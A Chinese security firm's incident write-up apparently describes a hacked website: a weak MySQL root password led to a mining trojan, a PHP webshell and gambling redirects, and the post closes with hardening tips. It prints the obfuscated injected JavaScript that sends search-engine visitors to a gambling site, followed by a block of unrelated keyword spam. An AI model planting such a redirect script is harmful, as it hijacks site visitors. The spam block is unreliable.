网站被黑、被入侵该如何解决?


 
         近日某客户网站被黑,导致网站首页被篡改并跳转到赌博网站,网站在百度的
收录也收录

了一些什么彩票内容的快照,网站首页快照也被修改成赌博内容,并被
百度直接红色风险拦截提

示,百度网址安全中心提醒您:该站点可能受到黑客攻击
,部分页面已被非法篡改!我们SINE安

全公司根据以上客户被黑的情况,立即进行
了全面的网站安全检测,针对网站被黑的情况制定了

详细的安全部署方案。

 
 
首先客户网站使用的是Linux centos系统服务器,客户提供服务器ip,ssh端口,root账号密码后

,我们进去查看了服务器是否存在被黑以及系统木马后门的情况,
再一个我们对其使用的

mysql数据库进行了安全检测,发现问题,该mysql数据库的
root账号使用的是弱口令密码,导

致攻击者可以利用软件对数据库进行强力破解,
导致破解成功,利用root权限直接提权并上传

脚本木马到网站的根目录下。
 
 
根据上面发现的数据库安全问题,我们深度挖掘,追踪溯源,发现服务器还存在木马后门,

top,查看linux当前进程,发现一个可疑的进程,通过查看进程的详细信
息我们发现该进程是木

马后门进程,再仔细一检查发现该木马是挖矿木马,攻击者
利用服务器资源,带宽,进行挖矿,

像比特币、以太坊等币进行挖矿。

 
 
我们对其挖矿木马进行安全分析:如下图


 
解密木马内容,我们发现该木马目前来说是免杀的木马,一般人是看不出问题来,但是经常维护

服务器的运维人员就会察觉出来,第一该木马隐藏到linux进程当中
去,根据时间段进行挖矿,避

开高峰时间,以及维护人员的工作时间,当挖矿的时
候木马进程CPU占用达到百分之80以上,甚

至有时候网站都打开很慢。

 
服务器的木马查完后,我们对网站的源代码进行安全检测,发现网站目录里被上传了网站木马

后门,php脚本木马,该脚本木马可以对网站进行读写新建等操作,网
站的首页标题描述也被

改成了什么赌博的内容如下图:

 
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e
 
(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString
 
(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=
 
[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)
 
if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}
 
('3.4("<5 c=\\"b\\">");3.4("d 1=3.f");3.4("e(1.2(\\"7\\")>0 || 1.2(\
 
\"6\\")>0 || 1.2(\\"8\\")>0 ||1.2(\\"a\\")>0 ||1.2(\\"9\\")>0 ||1.2(\
 
\"l\\")>0 ||1.2(\\"m\\")>0 ||1.2(\\"k\\")>0 )");3.4("h.g=\\"j://i.o.n\
 
\";");3.4("</5>");',25,25,'|s|indexOf|document|writeln|script|sogou|
 
baidu|soso|uc|sm|Javascript|LANGUAGE|var|if|referrer|href|location|www|
 
http|so|bing|yahoo|com|268238'.split('|'),0,{}))
</script>
 
通过解密上面的代码发现,只要是从百度,搜狗,以及soso,so,bing等搜索引擎来的访问,都会

直接跳转到攻击者设定好的赌博网站上去。随即我们SINE安全公司
对该恶意代码进行了清除,网

站恢复正常访问。
 
 
以上就是我们解决客户网站安全的整个过程,下面针对于此次网站被黑,提供如下的网站安全建议:
 
 
1.对mysql数据库进行安全部署,对root账号密码加密,尽可能设置的复杂一些,数字+大小写

字母+特殊符号,对网站数据库进行分配普通权限账号。
 
2.mysql数据库默认端口3306,改为51158,并加入到端口安全策略,不对外开放,外网IP无法

连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者
恶意猜测。
 
3.对服务器底层系统进行安全加固,包括SSH登录的安全验证。
 
4.对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。
分享:

相关推荐

  • 网站漏洞以及数据库安全的一些介绍
  • 网站漏洞都分那些种类?
  • 网站使用代理防火墙与状态检测技术的优势
  • 云存储安全性加密防止数据被泄露
  • webshell网站恶意代码检测的算法介绍
  • 利用神经网络算法对代码的相似性检查
  • 什么是内存马 如何检测webshell木马文件
头条

网站被攻击 该如何做好网站的安全防护?

企业网站遭受到攻击,首页文件被篡改,在百度的快照也被劫持...

最新发布

  • 网络行业的内卷是什么意思2021-11-23阅读(86)
  • CiscoIOS内存溢出攻击分析2021-11-23阅读(195)
  • 网络安全防护之ASA防火墙攻击代码2021-11-23阅读(185)
  • 网站漏洞以及数据库安全的一些介2021-11-18阅读(81)

标签云

网站漏洞 网站安全 网站漏洞修复 网站安全检测 网站被黑 网站被攻击 网络安全 网站漏洞检测 服务器安全 rce漏洞 网站被入侵 渗透测试 渗透测试工程师 渗透测试服务 XSS漏洞 服务器被攻击 网站安全维护 web安全 网络安全公司 服务器代维 业务漏洞 渗透测试公司 护网行动 网站安全防护 网站漏洞测试 API接口渗透测试 服务器运维 app渗透测试 网站漏洞扫描 网络安全服务

玻璃钢生产厂家桂林玻璃钢花钵生产厂家福建玻璃钢动物雕塑批发滨州玻璃钢垃圾桶制造营口玻璃钢造型批发河池玻璃钢花槽制作济宁玻璃钢天花吊顶哪家好芜湖玻璃钢树池制作晋城商业美陈厂家直销武汉玻璃钢花盆制造郑州玻璃钢花池哪家好泰安玻璃钢垃圾桶加工吴忠商业美陈多少钱运城玻璃钢摆件香港玻璃钢沙发制造泉州商业美陈厂家直销南阳玻璃钢外壳制造常州玻璃钢花钵厂昆明商场美陈定制茂名玻璃钢产品制造安徽玻璃钢公仔雕塑生产厂家济南玻璃钢花瓶多少钱酒泉玻璃钢定做四平玻璃钢沙发制作大同玻璃钢装饰定制酒泉商业美陈价格淮安玻璃钢机械外壳价格绥化玻璃钢家具定制山东玻璃钢装饰制造通辽玻璃钢前台厂嘉兴玻璃钢花箱制作香港通过《维护国家安全条例》两大学生合买彩票中奖一人不认账让美丽中国“从细节出发”19岁小伙救下5人后溺亡 多方发声卫健委通报少年有偿捐血浆16次猝死汪小菲曝离婚始末何赛飞追着代拍打雅江山火三名扑火人员牺牲系谣言男子被猫抓伤后确诊“猫抓病”周杰伦一审败诉网易中国拥有亿元资产的家庭达13.3万户315晚会后胖东来又人满为患了高校汽车撞人致3死16伤 司机系学生张家界的山上“长”满了韩国人?张立群任西安交通大学校长手机成瘾是影响睡眠质量重要因素网友洛杉矶偶遇贾玲“重生之我在北大当嫡校长”单亲妈妈陷入热恋 14岁儿子报警倪萍分享减重40斤方法杨倩无缘巴黎奥运考生莫言也上北大硕士复试名单了许家印被限制高消费奥巴马现身唐宁街 黑色着装引猜测专访95后高颜值猪保姆男孩8年未见母亲被告知被遗忘七年后宇文玥被薅头发捞上岸郑州一火锅店爆改成麻辣烫店西双版纳热带植物园回应蜉蝣大爆发沉迷短剧的人就像掉进了杀猪盘当地回应沈阳致3死车祸车主疑毒驾开除党籍5年后 原水城县长再被查凯特王妃现身!外出购物视频曝光初中生遭15人围殴自卫刺伤3人判无罪事业单位女子向同事水杯投不明物质男子被流浪猫绊倒 投喂者赔24万外国人感慨凌晨的中国很安全路边卖淀粉肠阿姨主动出示声明书胖东来员工每周单休无小长假王树国卸任西安交大校长 师生送别小米汽车超级工厂正式揭幕黑马情侣提车了妈妈回应孩子在校撞护栏坠楼校方回应护栏损坏小学生课间坠楼房客欠租失踪 房东直发愁专家建议不必谈骨泥色变老人退休金被冒领16年 金额超20万西藏招商引资投资者子女可当地高考特朗普无法缴纳4.54亿美元罚金浙江一高校内汽车冲撞行人 多人受伤

玻璃钢生产厂家 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化